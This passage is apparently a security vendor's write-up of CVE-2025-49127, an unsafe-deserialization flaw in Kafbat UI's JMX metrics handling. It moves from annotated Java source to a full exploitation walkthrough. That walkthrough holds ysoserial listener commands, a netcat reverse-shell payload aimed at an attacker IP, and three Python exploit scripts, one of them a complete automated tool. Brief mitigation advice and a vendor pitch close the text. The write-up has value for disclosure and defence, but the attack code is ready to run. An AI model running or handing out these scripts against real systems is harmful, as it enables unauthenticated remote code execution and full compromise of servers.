    var jmxMetrics = msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null);  // Query MBeans
    /*
     * CANONICAL_NAME_PATTERN = "kafka.server*:*"
     * This queries for all MBeans matching Kafka server pattern
     * 
     * VULNERABILITY 4: Additional deserialization risk
     * - queryNames() can trigger additional deserialization
     * - ObjectName creation can be exploited
     * - Response processing involves more deserialization
     */
    
    for (ObjectName jmxMetric : jmxMetrics) {
        sink.addAll(extractObjectMetrics(jmxMetric, msc));        // Extract individual metrics
    }
}

Jmx­Met­ric­sRe­triev­er.java – ex­trac­tO­b­ject­Met­rics method:

@SneakyThrows
private List<RawMetric> extractObjectMetrics(ObjectName objectName, MBeanServerConnection msc) {
    MBeanAttributeInfo[] attrNames = msc.getMBeanInfo(objectName).getAttributes();  // Get attribute info
    Object[] attrValues = new Object[attrNames.length];
    
    for (int i = 0; i < attrNames.length; i++) {
        attrValues[i] = msc.getAttribute(objectName, attrNames[i].getName());       // Get attribute values
        /*
         * VULNERABILITY 5: Multiple deserialization points
         * - getMBeanInfo() involves deserialization
         * - getAttribute() involves deserialization  
         * - Each call can be exploited by malicious server
         */
    }
    
    return JmxMetricsFormatter.constructMetricsList(objectName, attrNames, attrValues);
}

The at­tack re­lies on Java de­se­ri­al­iza­tion gad­get chains, which are se­quences of ex­ist­ing class­es that can be chained to­geth­er to achieve ar­bi­trary code ex­e­cu­tion when de­se­ri­al­ized. Com­mon gad­gets like Com­mon­sCol­lec­tions7 work by start­ing with a se­ri­al­ized ob­ject that, when de­se­ri­al­ized, trig­gers a chain of method calls in­clud­ing Hashtable.readObject(), which leads to Hashtable.reconstitutionPut(), then to LazyMap.get(), fol­lowed by ChainedTransformer.transform(), and fi­nal­ly to InvokerTransformer.transform() which can ex­e­cute ar­bi­trary code through Runtime.exec(). This en­tire chain ex­e­cutes au­to­mat­i­cal­ly dur­ing the de­se­ri­al­iza­tion process with­out any ad­di­tion­al user in­ter­ac­tion.

The SSL sock­et fac­to­ry im­ple­men­ta­tion in JmxSslSock­et­Fac­to­ry adds an­oth­er lay­er of com­plex­i­ty and po­ten­tial ex­ploita­tion. The sta­t­ic ini­tial­iza­tion block uses re­flec­tion to mod­i­fy JVM in­ter­nals through Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField(“defaultSocketFactory”) fol­lowed by defaultSocketFactoryField.set(null, new JmxSslSocketFactory()), which re­places the de­fault SSL sock­et fac­to­ry with a cus­tom im­ple­men­ta­tion. This cus­tom fac­to­ry al­lows for per-con­nec­tion SSL con­fig­u­ra­tion through thread-lo­cal vari­ables, but it also means that con­nec­tions to at­tack­er-con­trolled hosts will use this cus­tom fac­to­ry, po­ten­tial­ly pro­vid­ing ad­di­tion­al at­tack vec­tors through SSL cer­tifi­cate val­i­da­tion by­pass­es or SSL con­text ma­nip­u­la­tion.

JmxSslSock­et­Fac­to­ry.java – sta­t­ic ini­tial­iza­tion and cre­ate­Sock­et method:

static {
    boolean sslJmxSupported = false;
    try {
        // VULNERABILITY 6: Reflection-based modification of JVM internals
        Field defaultSocketFactoryField = SslRMIClientSocketFactory.class.getDeclaredField("defaultSocketFactory");
        defaultSocketFactoryField.setAccessible(true);
        defaultSocketFactoryField.set(null, new JmxSslSocketFactory());      // Replaces default factory
        sslJmxSupported = true;
    } catch (Exception e) {
        log.error("SSL can't be enabled for JMX retrieval. "
                + "Make sure your java app run with '--add-opens java.rmi/javax.rmi.ssl=ALL-UNNAMED' arg. Err: {}",
            e.getMessage());
        log.trace("SSL can't be enabled for JMX retrieval", e);
    }
    SSL_JMX_SUPPORTED = sslJmxSupported;
}

@Override
public Socket createSocket(String host, int port) throws IOException {
    var hostAndPort = new HostAndPort(host, port);
    
    // Check cache first
    if (CACHED_FACTORIES.containsKey(hostAndPort)) {
        return CACHED_FACTORIES.get(hostAndPort).createSocket(host, port);    // Use cached factory
    } else if (threadLocalContextSet()) {
        var factory = createFactoryFromThreadLocalCtx();                      // Create new factory
        CACHED_FACTORIES.put(hostAndPort, factory);                          // Cache it
        return factory.createSocket(host, port);                             // VULNERABLE: Connect to attacker host
    }
    return defaultSocketFactory.createSocket(host, port);                    // Fallback to default
}

The con­fig­u­ra­tion struc­ture de­fined in Clus­ter­sProp­er­ties al­lows for these ma­li­cious con­fig­u­ra­tions to be eas­i­ly con­struct­ed and sub­mit­ted. The Met­ric­sCon­fig­Da­ta class ac­cepts a type field that can be set to “JMX” to trig­ger the vul­ner­a­ble code path, a port field that ac­cepts any in­te­ger val­ue for the at­tack­er-con­trolled port, and op­tion­al user­name and pass­word fields that can be left null to avoid au­then­ti­ca­tion re­quire­ments. The de­fault con­fig­u­ra­tion be­hav­ior is par­tic­u­lar­ly dan­ger­ous, as shown in the setMetricsDefaults method which au­to­mat­i­cal­ly sets the met­rics type to JMX when not spec­i­fied: cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE).

Clus­ter­sProp­er­ties.java – Met­ric­sCon­fig­Da­ta class and set­Met­rics­De­faults method:

@Data
@ToString(exclude = "password")
public static class MetricsConfigData {
    String type;                                    // ISSUE: "JMX" triggers vulnerable code
    Integer port;                                   // ISSUE: Attacker-controlled port
    Boolean ssl;
    String username;                                // Can be null (no authentication)
    String password;                                // Can be null (no authentication)
    String keystoreLocation;
    String keystorePassword;
}

private void setMetricsDefaults() {
    for (Cluster cluster : clusters) {
        if (cluster.getMetrics() != null && !StringUtils.hasText(cluster.getMetrics().getType())) {
            cluster.getMetrics().setType(MetricsConfig.JMX_METRICS_TYPE);    // DANGEROUS DEFAULT
        }
    }
}


The ex­ploita­tion time­line re­veals how quick­ly this at­tack can be ex­e­cut­ed. At T+0, an at­tack­er sub­mits a ma­li­cious con­fig­u­ra­tion through the /api/config end­point. By T+5, the con­fig­u­ra­tion has been val­i­dat­ed and po­ten­tial­ly per­sist­ed to disk. At T+30, the sched­uled met­rics col­lec­tion process au­to­mat­i­cal­ly trig­gers, ini­ti­at­ing a JMX con­nec­tion to the at­tack­er-con­trolled serv­er. The RMI hand­shake be­gins at T+32, and by T+33, the ma­li­cious JMX serv­er sends craft­ed se­ri­al­ized ob­jects back to the client. Client-side de­se­ri­al­iza­tion oc­curs at T+34, trig­ger­ing the gad­get chain and achiev­ing ar­bi­trary code ex­e­cu­tion by T+35. This en­tire process oc­curs au­to­mat­i­cal­ly with­out any ad­di­tion­al user in­ter­ac­tion once the ma­li­cious con­fig­u­ra­tion is sub­mit­ted, mak­ing it a par­tic­u­lar­ly dan­ger­ous vul­ner­a­bil­i­ty that can achieve per­sis­tent com­pro­mise through the sched­uled ex­e­cu­tion mech­a­nism.

Ex­ploita­tion

The ex­ploita­tion process in­volves set­ting up ma­li­cious JMX servers us­ing ysose­r­i­al and trig­ger­ing the vul­ner­a­ble code path through con­fig­u­ra­tion API calls.

Step 1: Set Up Ma­li­cious JMX Serv­er for Ini­tial At­tack

First, we’ll set up a JMX serv­er that en­ables un­safe de­se­ri­al­iza­tion:

# Terminal 1: Set up JMX server to enable unsafe deserialization
java -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1718 ScalaProperties "org.apache.commons.collections.enableUnsafeSerialization:true"

This cre­ates a ma­li­cious JMX serv­er on port 1718 that will:

  • Ac­cept in­com­ing JMX con­nec­tions
  • Re­turn a ScalaProp­er­ties pay­load that en­ables un­safe de­se­ri­al­iza­tion
  • Set the sys­tem prop­er­ty to al­low Com­mons Col­lec­tions de­se­ri­al­iza­tion

Step 2: Trig­ger Ini­tial Ex­ploit

Now send the ma­li­cious con­fig­u­ra­tion to en­able un­safe de­se­ri­al­iza­tion:

#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Initial Setup Phase
Enables unsafe deserialization by setting system properties
"""

import requests
import json

# Configuration for the initial exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100"  # Replace with your host IP
JMX_PORT_INITIAL = 1718

def send_malicious_config(jmx_port, cluster_name="poc-initial"):
    """Send malicious cluster configuration to trigger JMX connection"""
    
    config_payload = {
        "config": {
            "properties": {
                "auth": {
                    "type": "DISABLED"
                },
                "rbac": {
                    "roles": []
                },
                "webclient": {},
                "kafka": {
                    "clusters": [
                        {
                            "name": "local",
                            "bootstrapServers": "kafka0:29092",
                            "schemaRegistry": "http://schema-registry0:8085",
                            "ksqldbServer": "http://ksqldb0:8088",
                            "kafkaConnect": [
                                {
                                    "name": "first",
                                    "address": "http://kafka-connect0:8083"
                                }
                            ],
                            "metrics": {
                                "type": "JMX",
                                "port": 9997
                            },
                            "properties": {},
                            "readOnly": False,
                            "audit": {
                                "topicAuditEnabled": True,
                                "consoleAuditEnabled": True,
                                "auditTopicProperties": {}
                            }
                        },
                        {
                            "name": cluster_name,
                            "bootstrapServers": f"kafka-malicious-broker:9093",
                            "metrics": {
                                "type": "JMX",
                                "port": jmx_port  # Attacker-controlled port
                            },
                            "properties": {},
                            "readOnly": False
                        }
                    ]
                }
            }
        }
    }
    
    headers = {
        "Content-Type": "application/json",
        "Accept": "*/*",
        "User-Agent": "CVE-2025-49127-Exploit/1.0"
    }
    
    try:
        response = requests.put(
            f"{KAFBAT_UI_URL}/api/config",
            headers=headers,
            json=config_payload,
            timeout=30
        )
        
        print(f"[+] Request sent to {KAFBAT_UI_URL}/api/config")
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        if response.status_code == 200:
            print("[+] Configuration accepted - JMX connection should be triggered")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error sending request: {e}")

if __name__ == "__main__":
    print("[*] CVE-2025-49127 Exploitation - Phase 1: Enable Unsafe Deserialization")
    print(f"[*] Target: {KAFBAT_UI_URL}")
    print(f"[*] Attacker Host: {ATTACKER_HOST}")
    print(f"[*] JMX Port: {JMX_PORT_INITIAL}")
    print("[*] Make sure ysoserial JMX server is running on port 1718")
    print()
    
    send_malicious_config(JMX_PORT_INITIAL)

Step 3: Set Up Re­verse Shell JMX Serv­er

In a new ter­mi­nal, set up the sec­ond ma­li­cious JMX serv­er for the ac­tu­al pay­load:

# Terminal 2: Set up reverse shell listener

nc -lvv 9094

# Terminal 3: Set up JMX server with reverse shell payloadjava -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7

`nc 192.168.1.100 9094 -e sh`

Step 4: Ex­e­cute Main Ex­ploit

Now ex­e­cute the main ex­ploit to get a re­verse shell:

#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Main Exploitation Phase
Executes reverse shell payload via unsafe deserialization
"""

import requests
import json
import time

# Configuration for the main exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100"  # Replace with your host IP
JMX_PORT_EXPLOIT = 1719
REVERSE_SHELL_PORT = 9094

def exploit_rce():
    """Execute the main RCE exploit"""
    
    config_payload = {
        "config": {
            "properties": {
                "auth": {
                    "type": "DISABLED"
                },
                "rbac": {
                    "roles": []
                },
                "webclient": {},
                "kafka": {
                    "clusters": [
                        {
                            "name": "local",
                            "bootstrapServers": "kafka0:29092",
                            "schemaRegistry": "http://schema-registry0:8085", 
                            "ksqldbServer": "http://ksqldb0:8088",
                            "kafkaConnect": [
                                {
                                    "name": "first",
                                    "address": "http://kafka-connect0:8083"
                                }
                            ],
                            "metrics": {
                                "type": "JMX",
                                "port": 9997
                            },
                            "properties": {},
                            "readOnly": False,
                            "audit": {
                                "topicAuditEnabled": True,
                                "consoleAuditEnabled": True,
                                "auditTopicProperties": {}
                            }
                        },
                        {
                            "name": "poc-rce",
                            "bootstrapServers": f"kafka-malicious-broker:9093",
                            "metrics": {
                                "type": "JMX",
                                "port": JMX_PORT_EXPLOIT  # Port with RCE payload
                            },
                            "properties": {},
                            "readOnly": False
                        }
                    ]
                }
            }
        }
    }
    
    headers = {
        "Content-Type": "application/json",
        "Accept": "*/*",
        "User-Agent": "CVE-2025-49127-Exploit/1.0"
    }
    
    try:
        print("[*] Sending RCE payload...")
        response = requests.put(
            f"{KAFBAT_UI_URL}/api/config",
            headers=headers,
            json=config_payload,
            timeout=30
        )
        
        print(f"[+] RCE payload sent")
        print(f"[+] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] Exploit successful! Check your reverse shell listener.")
        else:
            print(f"[-] Unexpected response: {response.text}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error during exploitation: {e}")

def main():
    print("[*] CVE-2025-49127 Exploitation - Phase 2: Remote Code Execution")
    print(f"[*] Target: {KAFBAT_UI_URL}")
    print(f"[*] Attacker Host: {ATTACKER_HOST}")
    print(f"[*] JMX Port: {JMX_PORT_EXPLOIT}")
    print(f"[*] Reverse Shell Port: {REVERSE_SHELL_PORT}")
    print()
    print("[!] Make sure you have:")
    print("    1. JMX server running on port 1719 with CommonsCollections7 payload")
    print("    2. Netcat listener running on port 9094")
    print("    3. Phase 1 exploit completed successfully")
    print()
    
    input("Press Enter when ready to exploit...")
    exploit_rce()

if __name__ == "__main__":
    main()

Step 5: Com­plete Au­to­mat­ed Ex­ploit

Here’s a com­plete au­to­mat­ed ex­ploit that com­bines both phas­es:

#!/usr/bin/env python3
"""
CVE-2025-49127 Complete Automated Exploit
Exploits unsafe deserialization in Kafbat UI JMX connection handling
"""

import requests
import json
import time
import subprocess
import threading
import socket
import sys

class CVE202549127Exploit:
    def __init__(self, target_url, attacker_host, reverse_port=9094):
        self.target_url = target_url.rstrip('/')
        self.attacker_host = attacker_host
        self.reverse_port = reverse_port
        self.jmx_setup_port = 1718
        self.jmx_exploit_port = 1719
        
    def check_target_accessible(self):
        """Check if target is accessible"""
        try:
            response = requests.get(f"{self.target_url}/actuator/health", timeout=5)
            return response.status_code == 200
        except:
            return False
    
    def setup_reverse_listener(self):
        """Set up reverse shell listener"""
        def listener():
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                sock.bind(('0.0.0.0', self.reverse_port))
                sock.listen(1)
                print(f"[+] Reverse shell listener started on port {self.reverse_port}")
                
                conn, addr = sock.accept()
                print(f"[+] Connection received from {addr}")
                
                while True:
                    data = conn.recv(1024)
                    if not data:
                        break
                    print(data.decode(), end='')
                    
            except Exception as e:
                print(f"[-] Error in reverse listener: {e}")
        
        thread = threading.Thread(target=listener, daemon=True)
        thread.start()
        return thread
    
    def setup_jmx_servers(self):
        """Setup malicious JMX servers using ysoserial"""
        try:
            # Setup JMX server for enabling unsafe deserialization
            setup_cmd = [
                'java', '-cp', 'ysoserial-0.0.6-all.jar',
                'ysoserial.exploit.JRMPListener',
                str(self.jmx_setup_port),
                'ScalaProperties',
                'org.apache.commons.collections.enableUnsafeSerialization:true'
            ]
            
            print(f"[*] Starting JMX setup server on port {self.jmx_setup_port}")
            setup_process = subprocess.Popen(setup_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            
            # Wait a moment for server to start
            time.sleep(2)
            
            # Setup JMX server for RCE payload
            exploit_cmd = [
                'java', '-cp', 'ysoserial-0.0.6-all.jar',
                'ysoserial.exploit.JRMPListener',
                str(self.jmx_exploit_port),
                'CommonsCollections7',
                f'nc {self.attacker_host} {self.reverse_port} -e sh'
            ]
            
            print(f"[*] Starting JMX exploit server on port {self.jmx_exploit_port}")
            exploit_process = subprocess.Popen(exploit_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            
            time.sleep(2)
            
            return setup_process, exploit_process
            
        except Exception as e:
            print(f"[-] Error setting up JMX servers: {e}")
            return None, None
    
    def send_malicious_config(self, jmx_port, cluster_name):
        """Send malicious cluster configuration"""
        config_payload = {
            "config": {
                "properties": {
                    "auth": {"type": "DISABLED"},
                    "rbac": {"roles": []},
                    "webclient": {},
                    "kafka": {
                        "clusters": [
                            {
                                "name": "local",
                                "bootstrapServers": "kafka0:29092",
                                "metrics": {"type": "JMX", "port": 9997},
                                "properties": {},
                                "readOnly": False
                            },
                            {
                                "name": cluster_name,
                                "bootstrapServers": "kafka-malicious-broker:9093",
                                "metrics": {
                                    "type": "JMX",
                                    "port": jmx_port
                                },
                                "properties": {},
                                "readOnly": False
                            }
                        ]
                    }
                }
            }
        }
        
        headers = {
            "Content-Type": "application/json",
            "Accept": "*/*",
            "User-Agent": "CVE-2025-49127-Exploit/1.0"
        }
        
        try:
            response = requests.put(
                f"{self.target_url}/api/config",
                headers=headers,
                json=config_payload,
                timeout=30
            )
            
            return response.status_code == 200
            
        except Exception as e:
            print(f"[-] Error sending configuration: {e}")
            return False
    
    def exploit(self):
        """Execute the complete exploit"""
        print("=" * 60)
        print("CVE-2025-49127 Kafbat UI RCE Exploit")
        print("=" * 60)
        print(f"Target: {self.target_url}")
        print(f"Attacker Host: {self.attacker_host}")
        print(f"Reverse Shell Port: {self.reverse_port}")
        print("=" * 60)
        
        # Check target accessibility
        print("[*] Checking target accessibility...")
        if not self.check_target_accessible():
            print("[-] Target not accessible. Please check the URL and network connectivity.")
            return False
        print("[+] Target is accessible")
        
        # Setup reverse shell listener
        print("[*] Setting up reverse shell listener...")
        listener_thread = self.setup_reverse_listener()
        time.sleep(1)
        
        # Setup JMX servers
        print("[*] Setting up malicious JMX servers...")
        setup_proc, exploit_proc = self.setup_jmx_servers()
        if not setup_proc or not exploit_proc:
            print("[-] Failed to setup JMX servers")
            return False
        print("[+] JMX servers ready")
        
        # Phase 1: Enable unsafe deserialization
        print("[*] Phase 1: Enabling unsafe deserialization...")
        if self.send_malicious_config(self.jmx_setup_port, "poc-setup"):
            print("[+] Phase 1 successful")
        else:
            print("[-] Phase 1 failed")
            return False
        
        time.sleep(3)
        
        # Phase 2: Execute RCE payload
        print("[*] Phase 2: Executing RCE payload...")
        if self.send_malicious_config(self.jmx_exploit_port, "poc-rce"):
            print("[+] RCE payload sent successfully!")
            print("[+] Check your reverse shell listener for incoming connection...")
            print("[*] If successful, you should have a shell connection")
        else:
            print("[-] Failed to send RCE payload")
            return False
        
        # Keep processes alive for a while
        print("[*] Keeping exploit servers alive for 60 seconds...")
        time.sleep(60)
        
        # Cleanup
        try:
            setup_proc.terminate()
            exploit_proc.terminate()
        except:
            pass
        
        return True

def main():
    if len(sys.argv) != 3:
        print("Usage: python3 exploit.py <target_url> <attacker_ip>")
        print("Example: python3 exploit.py http://localhost:8080 192.168.1.100")
        sys.exit(1)
    
    target_url = sys.argv[1]
    attacker_host = sys.argv[2]
    
    exploit = CVE202549127Exploit(target_url, attacker_host)
    success = exploit.exploit()
    
    if success:
        print("\n[+] Exploit completed successfully!")
    else:
        print("\n[-] Exploit failed!")

if __name__ == "__main__":
    main()

Us­age Ex­am­ple

# Make sure ysoserial is in the current directory
ls -la ysoserial-0.0.6-all.jar
# Run the complete exploit
python3 exploit.py http://localhost:8080 192.168.1.100

output:
# [+] Target is accessible
# [+] JMX servers ready  
# [+] Phase 1 successful
# [+] RCE payload sent successfully!
# [+] Check your reverse shell listener for incoming connection...

Mit­i­ga­tion

To pro­tect against CVE-2025-49127 and sim­i­lar vul­ner­a­bil­i­ties, im­ple­ment the fol­low­ing se­cu­ri­ty mea­sures:

Up­grade to Fixed Ver­sion:

# Update to Kafbat UI version 1.1.0 or later
docker pull ghcr.io/kafbat/kafka-ui:v1.1.0

Dis­able Dy­nam­ic Con­fig­u­ra­tion:

# In docker-compose.yml or application configuration
environment:
  DYNAMIC_CONFIG_ENABLED: 'false'

Con­clu­sion

CVE-2025-49127 rep­re­sents a crit­i­cal se­cu­ri­ty vul­ner­a­bil­i­ty in Kaf­bat UI 1.0.0 that demon­strates the dan­gers of un­safe de­se­ri­al­iza­tion in Java ap­pli­ca­tions. The vul­ner­a­bil­i­ty stems from the ap­pli­ca­tion’s dy­nam­ic con­fig­u­ra­tion fea­ture, which al­lows unau­then­ti­cat­ed users to spec­i­fy ar­bi­trary JMX end­points with­out prop­er val­i­da­tion. When the ap­pli­ca­tion at­tempts to con­nect to these at­tack­er-con­trolled JMX ser­vices, it be­comes sus­cep­ti­ble to Java de­se­ri­al­iza­tion at­tacks that can lead to com­plete sys­tem com­pro­mise. The vul­ner­a­bil­i­ty high­lights sev­er­al crit­i­cal se­cu­ri­ty prin­ci­ples that were vi­o­lat­ed in the orig­i­nal im­ple­men­ta­tion: lack of in­put val­i­da­tion, ab­sence of au­then­ti­ca­tion re­quire­ments for sen­si­tive op­er­a­tions, un­safe han­dling of ex­ter­nal con­nec­tions, and in­suf­fi­cient sand­box­ing of de­se­ri­al­iza­tion process­es. The at­tack vec­tor is par­tic­u­lar­ly dan­ger­ous be­cause it re­quires no au­then­ti­ca­tion and can be ex­ploit­ed re­mote­ly through a sim­ple HTTP re­quest to the con­fig­u­ra­tion API. Or­ga­ni­za­tions us­ing Kaf­bat UI should im­me­di­ate­ly up­grade to ver­sion 1.1.0 or lat­er, im­ple­ment prop­er au­then­ti­ca­tion and au­tho­riza­tion con­trols, and es­tab­lish net­work seg­men­ta­tion to lim­it the blast ra­dius of po­ten­tial at­tacks. Ad­di­tion­al­ly, im­ple­ment­ing com­pre­hen­sive mon­i­tor­ing and de­tec­tion ca­pa­bil­i­ties will help iden­ti­fy and re­spond to ex­ploita­tion at­tempts. This vul­ner­a­bil­i­ty serves as a re­minder of the im­por­tance of se­cure-by-de­fault de­sign prin­ci­ples and the need for thor­ough se­cu­ri­ty test­ing of dy­nam­ic con­fig­u­ra­tion fea­tures in en­ter­prise ap­pli­ca­tions.

For expert guidance on vulnerability management and/or penetration testing services contact SecureLayer7 to leverage tailored solutions and stay ahead of evolving security risks.

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading